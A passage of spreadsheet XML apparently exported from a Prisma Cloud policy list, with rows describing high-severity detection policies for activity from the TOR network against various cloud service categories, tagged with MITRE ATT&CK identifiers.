      <c r="U1531" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1531" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1531" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to containers that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1531"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1" t="inlineStr"/>
      <c r="Z1531" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1531" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1531" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1531" t="inlineStr"/>
      <c r="AD1531" t="b">
        <v>1</v>
      </c>
      <c r="AE1531" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1531" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>bf6c0681-90cd-45a0-af11-9c1bb661f9d0</t>
        </is>
      </c>
      <c r="AI1531" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1531" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1531" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1532">
      <c r="A1532"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2" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1532" s="2" t="inlineStr"/>
      <c r="D1532" t="inlineStr"/>
      <c r="E1532" t="inlineStr"/>
      <c r="F1532" t="inlineStr"/>
      <c r="G1532" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1532" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1532" t="inlineStr">
        <is>
          <t>Suspicious activity in Monitoring / Management services</t>
        </is>
      </c>
      <c r="L1532" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1532" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1532" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1532" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1532" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1532" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1532" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1532" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1532" t="b">
        <v>0</v>
      </c>
      <c r="U1532" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1532" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1532" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to monitoring or management services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1532"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2" t="inlineStr"/>
      <c r="Z1532" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1532" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1532" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1532" t="inlineStr"/>
      <c r="AD1532" t="b">
        <v>1</v>
      </c>
      <c r="AE1532" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1532" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>e79afd80-b0fb-4673-8c97-5ceb64bdbe25</t>
        </is>
      </c>
      <c r="AI1532" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1532" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1532" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1533">
      <c r="A1533"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3" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1533" s="2" t="inlineStr"/>
      <c r="D1533" t="inlineStr"/>
      <c r="E1533" t="inlineStr"/>
      <c r="F1533" t="inlineStr"/>
      <c r="G1533" t="b">
        <v>1</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1533" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1533" t="inlineStr">
        <is>
          <t>Suspicious activity in Web services</t>
        </is>
      </c>
      <c r="L1533" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1533" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1533" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1533" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1533" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1533" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1533" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1533" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1533" t="b">
        <v>0</v>
      </c>
      <c r="U1533" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1533" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1533" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity networks to access resources related to web services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1533"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3" t="inlineStr"/>
      <c r="Z1533" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1533" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1533" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1533" t="inlineStr"/>
      <c r="AD1533" t="b">
        <v>1</v>
      </c>
      <c r="AE1533" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1533" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>85a895d9-3a4c-454e-8de2-4b6a605c3cae</t>
        </is>
      </c>
      <c r="AI1533" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1533" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1533" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1534">
      <c r="A1534"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4" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1534" s="2" t="inlineStr"/>
      <c r="D1534" t="inlineStr"/>
      <c r="E1534" t="inlineStr"/>
      <c r="F1534" t="inlineStr"/>
      <c r="G1534" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1534" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1534" t="inlineStr">
        <is>
          <t>Suspicious activity in Analytics services</t>
        </is>
      </c>
      <c r="L1534" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1534" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1534" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1534" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1534" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1534" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1534" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1534" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1534" t="b">
        <v>0</v>
      </c>
      <c r="U1534" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1534" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1534" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to analytics that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1534"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4" t="inlineStr"/>
      <c r="Z1534" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1534" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1534" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1534" t="inlineStr"/>
      <c r="AD1534" t="b">
        <v>1</v>
      </c>
      <c r="AE1534" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1534" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>588dbb84-6e29-4b6c-a637-054d1102b29e</t>
        </is>
      </c>
      <c r="AI1534" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1534" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1534" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1535">
      <c r="A1535"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5" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1535" s="2" t="inlineStr"/>
      <c r="D1535" t="inlineStr"/>
      <c r="E1535" t="inlineStr"/>
      <c r="F1535" t="inlineStr"/>
      <c r="G1535" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1535" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1535" t="inlineStr">
        <is>
          <t>Suspicious activity in Security services</t>
        </is>
      </c>
      <c r="L1535" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1535" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1535" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1535" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1535" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1535" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1535" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1535" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1535" t="b">
        <v>0</v>
      </c>
      <c r="U1535" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1535" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1535" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to security services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1535"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5" t="inlineStr"/>
      <c r="Z1535" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1535" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1535" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1535" t="inlineStr"/>
      <c r="AD1535" t="b">
        <v>1</v>
      </c>
      <c r="AE1535" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1535" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>c6bec281-8c61-4896-8342-6fabac2816f8</t>
        </is>
      </c>
      <c r="AI1535" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1535" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1535" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1536">
      <c r="A1536"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6" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1536" s="2" t="inlineStr"/>
      <c r="D1536" t="inlineStr"/>
      <c r="E1536" t="inlineStr"/>
      <c r="F1536" t="inlineStr"/>
      <c r="G1536" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1536" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1536" t="inlineStr">
        <is>
          <t>Suspicious activity in Application Integration services</t>
        </is>
      </c>
      <c r="L1536" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1536" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1536" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1536" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1536" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1536" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1536" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1536" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1536" t="b">
        <v>0</v>
      </c>
      <c r="U1536" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1536" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1536" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to application integration that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1536"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6" t="inlineStr"/>
      <c r="Z1536" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1536" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1536" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1536" t="inlineStr"/>
      <c r="AD1536" t="b">
        <v>1</v>
      </c>
      <c r="AE1536" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1536" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>f974abe1-43ed-494b-ac12-bd9d4b636311</t>
        </is>
      </c>
      <c r="AI1536" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1536" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1536" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1537">
      <c r="A1537"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7" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1537" s="2" t="inlineStr"/>
      <c r="D1537" t="inlineStr"/>
      <c r="E1537" t="inlineStr"/>
      <c r="F1537" t="inlineStr"/>
      <c r="G1537" t="b">
        <v>1</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1537" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1537" t="inlineStr">
        <is>
          <t>Suspicious activity in Storage services</t>
        </is>
      </c>
      <c r="L1537" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1537" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1537" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1537" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1537" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1537" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1537" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1537" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1537" t="b">
        <v>0</v>
      </c>
      <c r="U1537" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1537" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1537" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to storage services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1537"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7" t="inlineStr"/>
      <c r="Z1537" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1537" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1537" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1537" t="inlineStr"/>
      <c r="AD1537" t="b">
        <v>1</v>
      </c>
      <c r="AE1537" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1537" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>0c28d0a6-88bd-4001-8af6-53bb5a2199c6</t>
        </is>
      </c>
      <c r="AI1537" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1537" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1537" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1538">
      <c r="A1538"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8" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1538" s="2" t="inlineStr"/>
      <c r="D1538" t="inlineStr"/>
      <c r="E1538" t="inlineStr"/>
      <c r="F1538" t="inlineStr"/>
      <c r="G1538" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1538" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1538" t="inlineStr">
        <is>
          <t>Suspicious activity in Networking services</t>
        </is>
      </c>
      <c r="L1538" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1538" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1538" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1538" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1538" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1538" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1538" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1538" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1538" t="b">
        <v>0</v>
      </c>
      <c r="U1538" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1538" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1538" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to networking services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1538"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8" t="inlineStr"/>
      <c r="Z1538" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1538" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1538" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1538" t="inlineStr"/>
      <c r="AD1538" t="b">
        <v>1</v>
      </c>
      <c r="AE1538" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1538" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>9a79c267-9063-45ab-97aa-339d530076f5</t>
        </is>
      </c>
      <c r="AI1538" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1538" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1538" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1539">
      <c r="A1539"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39" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1539" s="2" t="inlineStr"/>
      <c r="D1539" t="inlineStr"/>
      <c r="E1539" t="inlineStr"/>
      <c r="F1539" t="inlineStr"/>
      <c r="G1539" t="b">
        <v>1</v>
      </c>
      <c r="H15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39" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1539" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1539" t="inlineStr">
        <is>
          <t>Suspicious activity in Dev Tools services</t>
        </is>
      </c>
      <c r="L1539" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1539" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1539" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1539" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1539" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1539" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1539" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1539" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1539" t="b">
        <v>0</v>
      </c>
      <c r="U1539" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1539" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1539" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to developer tools that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1539"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39" t="inlineStr"/>
      <c r="Z1539" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1539" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1539" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1539" t="inlineStr"/>
      <c r="AD1539" t="b">
        <v>1</v>
      </c>
      <c r="AE1539" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1539" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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39" t="inlineStr">
        <is>
          <t>75bd7350-165b-4328-8104-892a383460c4</t>
        </is>
      </c>
      <c r="AI1539" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1539" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1539" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1540">
      <c r="A1540"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40" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1540" s="2" t="inlineStr"/>
      <c r="D1540" t="inlineStr"/>
      <c r="E1540" t="inlineStr"/>
      <c r="F1540" t="inlineStr"/>
      <c r="G1540" t="b">
        <v>1</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1540" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1540" t="inlineStr">
        <is>
          <t>Suspicious activity in Migration services</t>
        </is>
      </c>
      <c r="L1540" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1540" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1540" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1540" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1540" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1540" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1540" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1540" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1540" t="b">
        <v>0</v>
      </c>
      <c r="U1540" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1540" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1540" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to migration services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1540"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40" t="inlineStr"/>
      <c r="Z1540" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1540" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1540" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1540" t="inlineStr"/>
      <c r="AD1540" t="b">
        <v>1</v>
      </c>
      <c r="AE1540" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1540" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>11b5249e-d41e-4b32-8cbf-2f9c86a01a54</t>
        </is>
      </c>
      <c r="AI1540" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1540" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1540" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1541">
      <c r="A1541"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41" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1541" s="2" t="inlineStr"/>
      <c r="D1541" t="inlineStr"/>
      <c r="E1541" t="inlineStr"/>
      <c r="F1541" t="inlineStr"/>
      <c r="G1541" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1541" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1541" t="inlineStr">
        <is>
          <t>Suspicious activity in Compute services</t>
        </is>
      </c>
      <c r="L1541" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1541" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1541" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1541" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1541" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1541" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1541" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1541" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1541" t="b">
        <v>0</v>
      </c>
      <c r="U1541" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1541" t="inlineStr">
        <is>
